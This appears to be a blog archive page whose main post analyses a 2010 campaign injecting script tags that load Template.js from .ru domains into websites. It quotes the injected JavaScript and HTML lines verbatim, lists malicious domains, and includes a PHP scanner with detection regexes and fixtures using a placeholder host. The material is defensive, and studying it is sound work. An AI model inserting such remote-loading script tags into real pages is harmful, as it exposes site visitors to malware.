Archive for the ‘PHP’ Category

Getting pocketbloke.ru, inkrainbow.ru, pantsletter.ru JavaScript and PHP malware code injection hacks/infection? Get the fix here!

August 17th, 2010 124 comments

I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory, then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only, and search and fix.

Click here to see the .RU Removal Script in action! (demo)

or…

Click here for the .RU Removal Script Source Code

or here for it on PasteBin

Let me know in the comments if it works for you or if you have any feature requests!

Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. The attackers have an automatic script that will log in to your site using FTP and append a link to PHP and JS files containing their malicious code.

It looks like this in JavaScript files:

document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/Template.js"></scri'+'pt>');

PHP or HTML files contain the following at the end:

<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->

Here is a short list of some domain names that we’ve come across…

Known Malicious Domains:

  • pocketbloke.ru
  • inkrainbow.ru
  • pantsletter.ru
  • fightkid.ru
  • shirtdifficulty.ru
  • casechick.ru
  • obscurewax.ru
  • nuttypiano.com
  • Many others… (comment domains you find below)

STEPS TO TAKE TO REMOVE THE THREAT:

  1. Run MalwareBytes and get rid of anything on your machine
  2. Uninstall your FTP client
  3. Change your FTP passwords
  4. Update JAVA – According to this CERT KB
  5. Remove all traces of the scripts from your domains

UPDATE (8/26/2010): More than just .RU domains are now involved, which means the script in its current state won’t detect them. Working on a new way to detect this issue. Any ideas? Comment below.
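
The update above notes that matching on .RU alone no longer finds the injection. The following is an added example, not the original .RU Removal Script: it matches the structure of the two snippets shown earlier instead of the TLD, and keeps the search-only and search-and-fix modes with backups. It assumes the injected file name stays Template.js; the function name scanTree and the host bad.example.test are made up for the demonstration.

```php
<?php
// Added example, not the original .RU Removal Script. Assumption: the injected
// file is always named Template.js, as in both samples shown in the post.
const PATTERNS = [
    // PHP/HTML variant: external <script> tag plus optional 32-hex comment marker.
    '~\s*<script[^>]*src="https?://[a-z0-9.-]+/Template\.js"></script>(\s*<!--[0-9a-f]{32}-->)?~i',
    // JS variant: document.write() with the tag split as '<sc'+'ript' ... '</scri'+'pt>'.
    '~\s*document\.write\(\'<sc\'\+\'ript[^>]*src="https?://[a-z0-9.-]+/Template\.js"></scri\'\+\'pt>\'\);~i',
];

// Returns [path => number of injected snippets]; with $fix, backs up and rewrites.
function scanTree(string $root, array $exts, bool $fix): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile() || !in_array(strtolower($file->getExtension()), $exts, true)) {
            continue; // extension filter (also skips the .bak backups)
        }
        $path = $file->getPathname();
        $clean = preg_replace(PATTERNS, '', file_get_contents($path), -1, $count);
        if ($clean === null || $count === 0) {
            continue;
        }
        $hits[$path] = $count;
        // Search-and-fix mode: only rewrite once a backup copy exists.
        if ($fix && copy($path, $path . '.bak')) {
            file_put_contents($path, $clean);
        }
    }
    ksort($hits);
    return $hits;
}

// Constructed sample tree so the example runs offline; the host is a placeholder.
$root = sys_get_temp_dir() . '/inject_demo_' . getmypid();
mkdir("$root/js", 0700, true);
$tag = 'src="http://bad.example.test/Template.js"';
file_put_contents("$root/index.php", "<?php echo 'hi'; ?>\n<script type=\"text/javascript\" $tag></script>\n"
    . "<!--0123456789abcdef0123456789abcdef-->\n");
file_put_contents("$root/js/site.js",
    "var a = 1;\ndocument.write('<sc'+'ript type=\"text/javascript\" $tag></scri'+'pt>');\n");
file_put_contents("$root/about.html", "<p>clean page</p>\n");

$exts = ['php', 'html', 'htm', 'js'];
print_r(scanTree($root, $exts, false)); // search only
print_r(scanTree($root, $exts, true));  // search and fix
print_r(scanTree($root, $exts, false)); // search only again, after the fix
```

Any external script named Template.js is flagged, so review the search-only report before running the fix. Backups are written next to the originals with a .bak suffix and still contain the injected code; move them out of the web root once the fix is checked.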

Categories: Malware, PHP, Randomness, Security

Use PHP to check used and free space on remote computers

November 19th, 2009 2 comments

PHP Drive Space Report

Using the Google Charts API, PHP, and wmic together allows you to create awesome reports of used and free hard drive space. This is a Windows-only script. Check out the code below!

Categories: Google Charts, How To, PHP

PHP PC Live Screenshot Script

August 26th, 2009 No comments

Have you ever wanted to take live screenshots of a group of PCs to see what is going on? I’ve created a PHP script that teams up with a few remote control applications to do it for you!

Features include:

  • Instant screenshots of remote PCs
  • Refresh any PC’s image with 1 click
  • Shows currently logged on username
  • Searches Active Directory for user’s information and displays full name and other custom fields
  • Fully configurable and customizable

PHP SS Overview

PHP SS Zoom View

Here is a list of what you need to download:

After downloading all of the software, follow these steps:

  1. Install WampServer to the default folders and options
  2. Left click the new WampServer icon in your tray and select “Put Online”
  3. Again, left click the new WampServer icon in your tray, choose PHP -> PHP Settings -> Uncheck “Display Errors”
  4. Go to Start, click Run…, type in “services.msc” and hit Enter. Scroll all the way down until you find “wampapache”. Double click on it to bring up the properties window.
  5. Change the startup type to “Automatic”, then click the Log On tab. Select “This account” and enter in the credentials of a user with proper remote execution rights on the domain.
  6. Hit OK to close the properties window, right click on the “wampapache” service and choose Restart. Close the Services window.
  7. Extract PsTools.zip into the C:\Windows\System32 folder. Overwrite any existing files. Run PsExec.exe and click agree on the EULA.
  8. Install IrfanView. After installing, copy the i_view32.exe executable and paste it into the system32 folder.
  9. Open up an explorer window and browse to “C:\wamp\www” and delete the index.php file.
  10. Extract the contents of the “PHPSS.zip” file into the “C:\wamp\www” folder.
  11. Use your favorite text editor and open up “index.php”. Lines 10-30 are made to be easily configurable to fit your network’s structure. Make sure you change the computer naming scheme to work with yours.
  12. Start up a web browser and point to http://localhost and try it out! Comment and let me know how it goes 🙂

Categories: How To, PHP